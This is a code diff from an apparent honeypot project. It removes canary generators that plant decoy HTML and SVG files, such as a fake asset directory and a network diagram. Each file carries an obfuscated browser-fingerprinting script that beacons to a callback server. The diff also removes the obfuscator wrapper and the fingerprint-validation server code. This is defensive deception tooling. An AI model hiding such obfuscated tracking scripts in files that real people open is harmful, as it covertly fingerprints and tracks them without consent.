_PAGE_TEMPLATE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Internal Asset Directory</title>
<style>
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
margin:24px;font-size:13px}}
h1{{font-size:18px;margin:0 0 4px 0}}
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
table{{border-collapse:collapse;width:100%;background:#fff;
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
th{{background:#f4f4f4;font-weight:600;font-size:11px;
text-transform:uppercase;letter-spacing:.5px;color:#555}}
tr:hover td{{background:#fafbff}}
.foot{{margin-top:16px;color:#999;font-size:11px}}
</style>
</head>
<body>
<h1>Internal Asset Directory</h1>
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
<table>
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
{rows}
</table>
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
<script>{payload}</script>
</body>
</html>
"""
_ROW_POOL = (
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
)
def _build_rows(callback_token: str) -> tuple[str, int]:
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
take = 5 + (_stable_int(callback_token, "take") % 4)
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
cells = "\n".join(
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
for row in selected
)
return cells, len(selected)
def _sync_label(callback_token: str) -> str:
day = _stable_int(callback_token, "day") % 28 + 1
hour = _stable_int(callback_token, "hour") % 24
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
class FingerprintHtmlGenerator(CanaryGenerator):
"""Synthesise an HTML page that fingerprints the browser opening it."""
name = "fingerprint_html"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
rows, row_count = _build_rows(ctx.callback_token)
body = _PAGE_TEMPLATE.format(
sync_label=_sync_label(ctx.callback_token),
row_count=row_count,
rows=rows,
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 14,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)

View File

@@ -1,88 +0,0 @@
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
that runs the obfuscated fingerprinter when the file is opened directly
in a browser.
SVG ``<script>`` only fires when the SVG is loaded as a top-level
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
SVG is referenced from another page's ``<img>``. That's the right
posture for canary use: an attacker browsing the decky filesystem and
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
inside a sandboxed CMS preview does not.
Same determinism guarantees as :mod:`fingerprint_html`.
"""
from __future__ import annotations
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
<style>
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
</style>
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
<path class="edge" d="M160 105 L240 105"/>
<path class="edge" d="M360 105 L440 105"/>
<path class="edge" d="M300 130 L300 220"/>
<script type="application/ecmascript"><![CDATA[
{payload}
]]></script>
</svg>
"""
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
class FingerprintSvgGenerator(CanaryGenerator):
"""Synthesise an SVG that fingerprints the browser opening it."""
name = "fingerprint_svg"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
day = _stable_int(ctx.callback_token, "day") % 28 + 1
body = _DIAGRAM_TEMPLATE.format(
region=region,
ver=ver,
review=f"2026-03-{day:02d}",
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 30,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)

View File

@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
try:
from pikepdf import Pdf, Name, Dictionary, String
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
except ImportError as e:
raise InstrumenterRejectedError(
"honeydoc_pdf requires pikepdf; install it (`pip install "

View File

@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact:
try:
from PIL import Image, PngImagePlugin
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
except ImportError as e:
raise InstrumenterRejectedError(
"image instrumenter requires Pillow; install it (`pip "

View File

@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact:
try:
import pikepdf
import pikepdf # type: ignore[import-not-found]
except ImportError as e:
raise InstrumenterRejectedError(
"PDF instrumenter requires pikepdf; install it (`pip "

View File

@@ -1,177 +0,0 @@
"""Per-mint JS obfuscator wrapper.
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
Used by the fingerprint generators / instrumenters to produce a unique,
hard-to-statically-analyse JS blob per canary mint.
Two design choices flow from the canary contract in :mod:`base`:
* **Determinism.** Generators must return byte-identical artifacts for
the same ``(callback_token, http_base, dns_zone, persona)``. We
derive a numeric seed from the callback token and pass it to the
obfuscator's own ``seed`` option, and we derive the polymorphic
config bits from the same hash so a re-mint reproduces exactly.
* **Per-mint uniqueness.** Two different callback tokens produce
structurally different output: different identifier names, different
string-array rotation, optionally different transforms enabled.
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
We pass code+options as JSON on stdin and read the obfuscated result
from stdout. Stderr surfaces obfuscator failures.
"""
from __future__ import annotations
import hashlib
import hmac
import json
import os
import subprocess # nosec B404 — Node helper exec is the whole point
from pathlib import Path
from typing import Any
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
# specific runtime; default to PATH lookup.
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
# Hard timeout for the obfuscator subprocess. Real runs on the
# fingerprint payload sit well under 5s on a dev box.
_TIMEOUT_S = 30
class ObfuscatorError(RuntimeError):
"""Raised when the Node helper fails or returns empty output."""
class FingerprintSecretMissing(RuntimeError):
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
Fingerprint canaries embed a per-mint nonce derived from this
server-side secret; without it the worker cannot validate incoming
fingerprint beacons, so we fail loud at mint time rather than ship
a defeatable canary.
"""
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
def nonce_for(callback_token: str, mint_uuid: str) -> str:
"""Compute the per-mint fingerprint nonce.
HMAC-SHA256 keyed on the server-side master secret, message is
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
(~64 bits of entropy) — enough to defeat slug-only forgery while
fitting comfortably into a query string.
"""
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
if not secret:
raise FingerprintSecretMissing(
f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
)
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
def _seed_from_token(callback_token: str) -> int:
"""Derive a 31-bit numeric seed from the callback token.
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
using a SHA-256-derived prefix gives us a uniform distribution
across the 31-bit positive range.
"""
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
def _config_from_seed(seed: int) -> dict[str, Any]:
"""Build a deterministic, per-mint obfuscator config.
The hash bits drive *which* transforms apply — two mints get
structurally different outputs, not just different identifier names.
Defaults stay aggressive enough that reverse engineering is real
work; we never disable string-array or rename, only vary the dial.
"""
bits = seed
encodings = ("base64", "rc4")
string_array_encoding = [encodings[bits & 1]]
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
transform_object_keys = bool((bits >> 17) & 1)
numbers_to_expressions = bool((bits >> 18) & 1)
simplify = bool((bits >> 19) & 1)
return {
"compact": True,
"seed": seed,
"controlFlowFlattening": True,
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
"deadCodeInjection": True,
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
"stringArray": True,
"stringArrayEncoding": string_array_encoding,
"stringArrayThreshold": 1,
"stringArrayRotate": True,
"stringArrayShuffle": True,
"splitStrings": True,
"splitStringsChunkLength": 4 + (bits & 7),
"transformObjectKeys": transform_object_keys,
"numbersToExpressions": numbers_to_expressions,
"simplify": simplify,
"selfDefending": False, # breaks SVG embed; not worth the cost
"renameGlobals": False,
"identifierNamesGenerator": "mangled-shuffled",
}
def obfuscate(code: str, *, callback_token: str) -> str:
"""Obfuscate *code* deterministically per *callback_token*.
Raises :class:`ObfuscatorError` if Node fails or returns empty.
"""
seed = _seed_from_token(callback_token)
options = _config_from_seed(seed)
payload = json.dumps({"code": code, "options": options})
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
[_NODE_BIN, str(_HELPER)],
input=payload, capture_output=True, text=True,
timeout=_TIMEOUT_S, check=False,
)
except FileNotFoundError as e:
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
except subprocess.TimeoutExpired as e:
raise ObfuscatorError("javascript-obfuscator timed out") from e
if proc.returncode != 0:
raise ObfuscatorError(
f"javascript-obfuscator failed rc={proc.returncode} "
f"stderr={proc.stderr.strip()[:400]}"
)
out = proc.stdout
if not out.strip():
raise ObfuscatorError("javascript-obfuscator returned empty output")
return out
def render_fingerprint_js(
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
"""Build the obfuscated fingerprint JS for a single mint.
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
``{{MINT_NONCE}}`` in the payload template, then runs it through
:func:`obfuscate` with a seed derived from the callback token.
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
the row's :attr:`CanaryToken.fingerprint_nonce`.
"""
template = _PAYLOAD.read_text(encoding="utf-8")
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
src = (
template
.replace("{{BEACON_URL}}", beacon)
.replace("{{MINT_UUID}}", mint_uuid)
.replace("{{MINT_NONCE}}", nonce)
)
return obfuscate(src, callback_token=callback_token)

View File

@@ -1,10 +0,0 @@
{
"name": "decnet-canary-obfuscator",
"version": "0.1.0",
"private": true,
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
"main": "_obfuscate_helper.js",
"dependencies": {
"javascript-obfuscator": "^5.4.2"
}
}

View File

@@ -28,8 +28,6 @@ _LINUX_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}
_WINDOWS_DEFAULTS: dict[str, str] = {
@@ -40,8 +38,6 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}

View File

@@ -20,8 +20,11 @@ shape but speaks bytes-via-base64 over the wire.
"""
from __future__ import annotations
import asyncio
import base64
import os
from datetime import datetime, timedelta, timezone
import shlex
import time
from secrets import token_urlsafe
from typing import Any, Iterable, Optional
@@ -31,16 +34,13 @@ from decnet.bus.factory import get_bus
from decnet.canary.base import CanaryArtifact, CanaryContext
from decnet.canary.factory import get_generator
from decnet.canary.paths import default_path_for
from decnet.decky_io import (
delete_file_from_container,
resolve_topology_container,
write_file_to_container,
)
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
log = get_logger("canary.planter")
_DOCKER = "docker"
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most
@@ -52,16 +52,62 @@ def _container_for(decky_name: str) -> str:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
# resolve_topology_container is re-exported from decky_io for back-compat
# with callers (tests, deploy hook) that imported it from this module
# before the decky_io extraction.
__all__ = [
"plant",
"revoke",
"resolve_topology_container",
"seed_baseline",
"seed_baseline_topology",
]
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
) -> tuple[int, str, str]:
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
"""Compose the ``sh -c`` script + stdin payload for one artifact.
Binary safety: we base64-encode on the host and stream the result
over stdin to ``base64 -d`` inside the container, so the bytes
never touch the argv (kernel ARG_MAX would reject anything larger
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
and ``touch -d @<unix_ts>`` are present on every Linux base image
we ship, so there's no per-distro branching.
"""
encoded = base64.b64encode(artifact.content)
mtime = int(time.time() + artifact.mtime_offset)
mode_str = oct(artifact.mode)[2:]
parts = [
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
f"base64 -d > {shlex.quote(artifact.path)}",
f"chmod {mode_str} {shlex.quote(artifact.path)}",
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
]
return " && ".join(parts), encoded
async def _publish(
@@ -93,7 +139,6 @@ async def plant(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Write *artifact* into the decky's ssh container.
@@ -112,12 +157,13 @@ async def plant(
await repo.update_canary_token_state(token_uuid, "failed", err)
return False, err
target_container = container or _container_for(decky_name)
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
success, error = await write_file_to_container(
target_container, artifact.path, artifact.content,
mode=artifact.mode, mtime=mtime,
)
sh_cmd, stdin_payload = _build_plant_command(artifact)
# ``-i`` keeps stdin attached so base64 -d inside the container can
# consume the encoded payload streamed from the host.
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None:
if success:
@@ -136,8 +182,8 @@ async def plant(
if not success:
log.warning(
"canary.plant failed decky=%s token=%s container=%s err=%r",
decky_name, token_uuid, target_container, error,
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
decky_name, token_uuid, rc, stderr[:120],
)
return success, error
@@ -150,7 +196,6 @@ async def revoke(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Best-effort unlink + state transition + bus publish.
@@ -158,10 +203,11 @@ async def revoke(
the file is gone after the call (whether we deleted it or it was
already missing); only docker / container-down errors return False.
"""
target_container = container or _container_for(decky_name)
success, error = await delete_file_from_container(
target_container, placement_path,
)
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None:
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -204,7 +250,6 @@ async def seed_baseline(
persona: str = "linux",
created_by: str = "system",
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> list[dict[str, Any]]:
"""Plant the configured baseline canary set on one decky.
@@ -248,59 +293,9 @@ async def seed_baseline(
await plant(
decky_name, artifact,
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
container=container,
)
out.append({
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
"callback_token": slug, "placement_path": artifact.path,
})
return out
async def seed_baseline_topology(
repo: BaseRepository,
topology_id: str,
*,
created_by: str = "system",
bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
"""Plant baseline canaries on every decky in a MazeNET topology.
Mirrors :func:`seed_baseline` for the topology path. Container name
resolution uses :func:`resolve_topology_container` since topology
deckies may not have an ssh service — in that case we target the
base container instead.
Best-effort: failures on any single decky are logged inside
:func:`plant`; the deploy hook treats the return value as
informational. Returns a flat list of per-token dicts (with an added
``decky_name`` key) across all deckies.
"""
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
log.warning(
"canary.seed_baseline_topology: topology %s not found", topology_id,
)
return []
out: list[dict[str, Any]] = []
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
services = decky.get("services") or []
container = resolve_topology_container(topology_id, decky_name, services)
# MazeNET deckies don't carry an OS persona today; default to
# linux (every base image we ship is Linux).
rows = await seed_baseline(
decky_name, repo,
persona="linux", created_by=created_by, bus=bus,
container=container,
)
for r in rows:
r["decky_name"] = decky_name
out.append(r)
return out

View File

@@ -26,14 +26,9 @@ crashes loudly rather than masking failures.
from __future__ import annotations
import asyncio
import base64
import binascii
import json
import os
import time
import uuid
from datetime import datetime, timezone
from typing import Any, Optional
from typing import Optional
from fastapi import FastAPI, Request, Response
@@ -55,41 +50,6 @@ _TRANSPARENT_GIF = bytes.fromhex(
)
# Namespace used by fingerprint generators to derive mint UUID.
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
key = (token_uuid, src_ip)
now = time.monotonic()
cutoff = now - _FP_RATE_WINDOW_S
bucket = _fp_rate_buckets.get(key, [])
bucket = [t for t in bucket if t > cutoff]
if len(bucket) >= _FP_RATE_LIMIT:
_fp_rate_buckets[key] = bucket
return False
bucket.append(now)
_fp_rate_buckets[key] = bucket
return True
def _is_valid_fp_shape(fp: dict) -> bool:
"""Layer B — structural sanity check on a decoded fingerprint blob."""
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
return False
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
return present >= 3
def _http_base() -> str:
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -144,11 +104,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
@app.get("/c/{slug}")
async def callback(slug: str, request: Request) -> Response:
raw_nonce = request.query_params.get("k")
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
merged_headers = dict(request.headers)
if fp_meta:
merged_headers.update(fp_meta)
await _record_hit(
repo, bus,
slug=slug,
@@ -156,9 +111,7 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
user_agent=request.headers.get("user-agent"),
request_path=str(request.url.path),
dns_qname=None,
raw_headers=merged_headers,
parsed_fp=parsed_fp,
raw_nonce=raw_nonce,
raw_headers=dict(request.headers),
)
# Always 200 with a tiny image so the attacker's client sees
# a "success" — same return regardless of whether the slug is
@@ -176,67 +129,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
return app
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
Returns a tuple of:
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
when there's no ``?d=`` or decoding fails.
"""
out: dict[str, Any] = {}
parsed_fp: Optional[dict] = None
if not qp:
return out, parsed_fp
o = qp.get("o") if hasattr(qp, "get") else None
if o:
out["_fp_open"] = "1"
d = qp.get("d") if hasattr(qp, "get") else None
if not d:
return out, parsed_fp
if len(d) > _FP_CHUNK_MAX:
out["_fp_oversize"] = "1"
return out, parsed_fp
sid = qp.get("s")
idx = qp.get("i")
total = qp.get("n")
if sid and idx and total:
out["_fp_sid"] = sid
out["_fp_idx"] = idx
out["_fp_total"] = total
out["_fp_chunk"] = d
return out, parsed_fp
# Single-shot: decode and pass back as parsed_fp; validation runs in
# _record_hit after token lookup so we have the stored nonce at hand.
try:
padded = d + "=" * (-len(d) % 4)
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
parsed = json.loads(raw.decode("utf-8"))
except (binascii.Error, ValueError, UnicodeDecodeError):
out["_fp_decode_error"] = "1"
return out, parsed_fp
if isinstance(parsed, dict):
parsed_fp = parsed
else:
out["_fp_decode_error"] = "1"
return out, parsed_fp
def _client_ip(request: Request) -> str:
# Honor X-Forwarded-For if the operator deployed behind a reverse
# proxy. Take the leftmost address in the chain; everything after
@@ -262,58 +154,16 @@ async def _record_hit(
request_path: Optional[str],
dns_qname: Optional[str],
raw_headers: Optional[dict],
parsed_fp: Optional[dict] = None,
raw_nonce: Optional[str] = None,
) -> None:
"""Resolve slug -> token, persist a trigger, publish on the bus.
Unknown slugs are silently swallowed: returning the same response
for known and unknown slugs is the stealth posture, and persisting
every random scan would clutter the DB.
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
it is validated through four layers before being merged into raw_headers:
A) nonce match against CanaryToken.fingerprint_nonce,
B) structural shape check,
C) mint UUID consistency,
D) per-(token, IP) rate limit.
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
The trigger row always lands regardless — the GET hit is itself forensic.
"""
token = await repo.get_canary_token_by_slug(slug)
if token is None:
return
final_headers: dict[str, Any] = dict(raw_headers or {})
if parsed_fp is not None:
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
# Layer A — nonce
if stored_nonce is not None and raw_nonce != stored_nonce:
final_headers["_fp_invalid_nonce"] = "1"
parsed_fp = None
# Layer B — shape (only when nonce passed or no nonce enforced)
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
final_headers["_fp_invalid_shape"] = "1"
parsed_fp = None
# Layer C — mint UUID consistency
if parsed_fp is not None:
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
if parsed_fp.get("mint") != expected_mint:
final_headers["_fp_invalid_mint"] = "1"
parsed_fp = None
# Layer D — rate limit
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
final_headers["_fp_rate_limited"] = "1"
parsed_fp = None
if parsed_fp is not None:
final_headers["_fp"] = parsed_fp
trigger_id = await repo.record_canary_trigger({
"token_uuid": token["uuid"],
"occurred_at": datetime.now(timezone.utc),
@@ -321,7 +171,7 @@ async def _record_hit(
"user_agent": user_agent,
"request_path": request_path,
"dns_qname": dns_qname,
"raw_headers": final_headers,
"raw_headers": raw_headers or {},
})
try:
await bus.publish(
@@ -339,22 +189,6 @@ async def _record_hit(
except Exception as e: # noqa: BLE001 — best effort
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
# Auto-deregister fingerprint canaries after the first valid fingerprint
# is collected. Slug goes dark; the stealth posture means the attacker
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
# http/dns canaries are NOT auto-revoked.
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
try:
await repo.update_canary_token_state(token["uuid"], "revoked")
await bus.publish(
topics.canary(token["uuid"], topics.CANARY_REVOKED),
{"token_id": token["uuid"], "trigger_id": trigger_id,
"reason": "fingerprint_collected"},
)
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
# ---------------------------- DNS surface --------------------------------
@@ -380,7 +214,7 @@ async def _start_dns_server(
local_addr=(_dns_bind(), _dns_port()),
)
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
return transport
return transport # type: ignore[return-value]
# ---------------------------- entry point --------------------------------

View File

@@ -39,7 +39,6 @@ from . import (
swarm,
swarmctl,
topology,
ttp,
updater,
web,
webhook,
@@ -60,7 +59,7 @@ for _mod in (
swarm,
deploy, lifecycle, workers, inventory,
web, profiler, orchestrator, realism, reconciler, sniffer, db,
topology, bus, geoip, init, webhook, canary, ttp,
topology, bus, geoip, init, webhook, canary,
):
_mod.register(app)

View File

@@ -1,13 +1,8 @@
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
Two entry points share this module:
* ``decnet canary`` — runs the worker process. Mirrors the shape of
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
systemd unit so its argv must stay stable.
* ``decnet canary-install-toolchain`` — provisions the Node side of
the fingerprint-canary obfuscator. Idempotent; safe to call from
the API service unit's ``ExecStartPre``.
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
``@app.command(name="canary")`` Typer entry point that delegates to
:func:`decnet.canary.worker.run`.
Not master-only — any host that hosts deckies can run its own
canary worker (the bus events stay local; the webhook worker on
@@ -16,17 +11,11 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
"""
